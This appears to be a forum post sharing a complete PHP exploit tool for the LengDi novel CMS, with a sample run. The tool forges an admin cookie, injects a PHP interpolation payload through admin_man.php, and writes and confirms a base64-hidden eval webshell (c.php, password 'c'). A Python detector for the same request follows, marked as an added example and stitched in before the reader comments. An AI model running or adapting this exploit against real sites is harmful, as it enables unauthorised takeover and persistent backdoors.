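Exploit tool for the LengDi (冷迪) novel system vulnerability
This vulnerability was disclosed a while ago. I had not bothered to post it because it has already been reposted in many places; today I am sharing an exploit tool for it.
Source: http://www.t00ls.net/thread-5452-1-1.html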
<?php
ini_set("max_execution_time",0);
function post($v_hosts,$v_paths,$v_p)
{
$host = $v_hosts;
$path = $v_paths;
$pa = $v_p;
$data="sitename=&siteurl=%24%7B%24%7Bfputs%28fopen%28base64_decode%28Yy5waHA%29%2Cw%29%2Cbase64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5odWFu%29%29%7D%7D&email=&keywords=&flush=6&html=1&reurl=1&link=&tongji=&cmdSave=%C8%B7%C8%CF%D0%DE%B8%C4";
$packet ="POST ".$path.$pa."/admin_man.php?id=save HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: 127.0.0.1\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cookie: x_Cookie=admin;\r\n\r\n";
$packet.=$data;
$o = @fsockopen($host,80);
if(!$o){
echo "\n[x] 没有返回,网站有可能访问不了!";
die;
}
fputs($o,$packet);
$i="[x]等待中.";
echo $i;
$b=".";
while (!feof($o)){
$data.=fread($o,1024);
$b.=".";
echo $b;
}
fclose($o);
$ok=strstr( $data,"alert");
if( empty($ok)){
echo "\n[x] 未成功,至于原因嘛,自己找吧!";
die;
}else{
echo "\n[O]写入配置成功!\r\n";
}
}
function got($g_hosts,$g_paths)
{
$host1 = $g_hosts;
$path1 = $g_paths;
$packet1="GET ".$path1."/config.php HTTP/1.1\r\n";
$packet1.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet1.="Host: 127.0.0.1\r\n";
$packet1.="Connection: Keep-Alive\r\n\r\n";
$fg = @fsockopen($host1,80);
fputs($fg,$packet1);
$packet2="GET ".$path1."/c.php HTTP/1.1\r\n";
$packet2.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet2.="Host: 127.0.0.1\r\n";
$packet2.="Connection: Keep-Alive\r\n\r\n";
fputs($fg,$packet2);
$i="[x]写入shell中.";
echo $i;
$b=".";
while(!feof($fg)){
$data1.=fread($fg,1024);
$b.=".";
echo $b;
}
$ok1 = strstr( $data1,"huan");
if (empty($ok1)){
echo "\n[x] 没有写入?自己查找原因。";
die;
}else{
echo "\n[O]试试webshell吧 \r\n[O]地址是http://".$host1."/c.php 密码是 c 。";
}
fclose($fg);
}
$hosts = $argv[1];
$paths = $argv[2];
$p = $argv[3];
if(empty($hosts) or empty($paths) or empty($p)){
print_r(' [x] 冷迪小说系统漏洞利用工具
[x] CODE BY 幻泉(bl4ck)
[-] 用法: php exp.php 网站地址 网站路径 后台路径
[-] php exp.php localhost /ldbook/ admin
');
die;
}
post($hosts,$paths,$p);
got($hosts,$paths);
?>
C:\php>php.exe exp.php 192.168.1.51 /ldbook/ admin
[x]等待中......
[O]写入配置成功!
[x]写入shell中..........
[O]试试webshell吧
[O]地址http://192.168.1.51/c.php 密码是 c 。
C:\php>
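A defender-side check for the request this tool sends, as an added example that is not part of the original post: it flags a POST to admin_man.php?id=save that carries only the static x_Cookie=admin cookie, or a form value containing PHP's `${` interpolation syntax, which PHP evaluates inside double-quoted strings. The function name, the finding labels and both sample requests are constructed for illustration, and treating a lone x_Cookie=admin as suspicious is an assumed heuristic.

```python
import re
from urllib.parse import parse_qsl

# PHP evaluates ${expr} and {$expr} inside double-quoted strings, so such a
# value stored in a generated config file runs when that file is next loaded.
PHP_INTERPOLATION = re.compile(r"\$\{|\{\$")
SAVE_ENDPOINT = re.compile(r"/admin_man\.php\?(?:.*&)?id=save\b", re.I)


def inspect_request(method, target, headers, body):
    """Return a list of findings for one HTTP request (empty list = clean)."""
    findings = []
    if method.upper() != "POST" or not SAVE_ENDPOINT.search(target):
        return findings
    cookies = dict(
        part.strip().split("=", 1)
        for part in headers.get("Cookie", "").split(";")
        if "=" in part
    )
    # Assumed heuristic: the tool sends this static cookie and nothing else.
    if cookies.get("x_Cookie") == "admin" and len(cookies) == 1:
        findings.append("static-admin-cookie")
    # latin-1 decoding never fails, so GBK-encoded fields cannot break parsing.
    for name, value in parse_qsl(body, keep_blank_values=True, encoding="latin-1"):
        if PHP_INTERPOLATION.search(value):
            findings.append(f"php-interpolation-in:{name}")
    return findings


# Constructed samples: same request shape as the tool above, harmless marker value.
SUSPICIOUS = (
    "POST", "/ldbook/admin/admin_man.php?id=save",
    {"Cookie": "x_Cookie=admin;"},
    "sitename=&siteurl=%24%7B%24%7Bexample%28%29%7D%7D&email=&cmdSave=%C8%B7%C8%CF",
)
BENIGN = (
    "POST", "/ldbook/admin/admin_man.php?id=save",
    {"Cookie": "PHPSESSID=abc123; x_Cookie=admin"},
    "sitename=My+Books&siteurl=http%3A%2F%2Fexample.test%2F&email=a%40example.test",
)

if __name__ == "__main__":
    for label, req in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, inspect_request(*req))
```

The tool's second stage requests config.php and then a c.php that did not exist before, so a newly created .php file in the web root is a complementary indicator for file-integrity monitoring.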
I don't really understand this.
I'll come back to ask the blogger again.
白银时代 replied on 2010-1-17 22:45:24: Added.
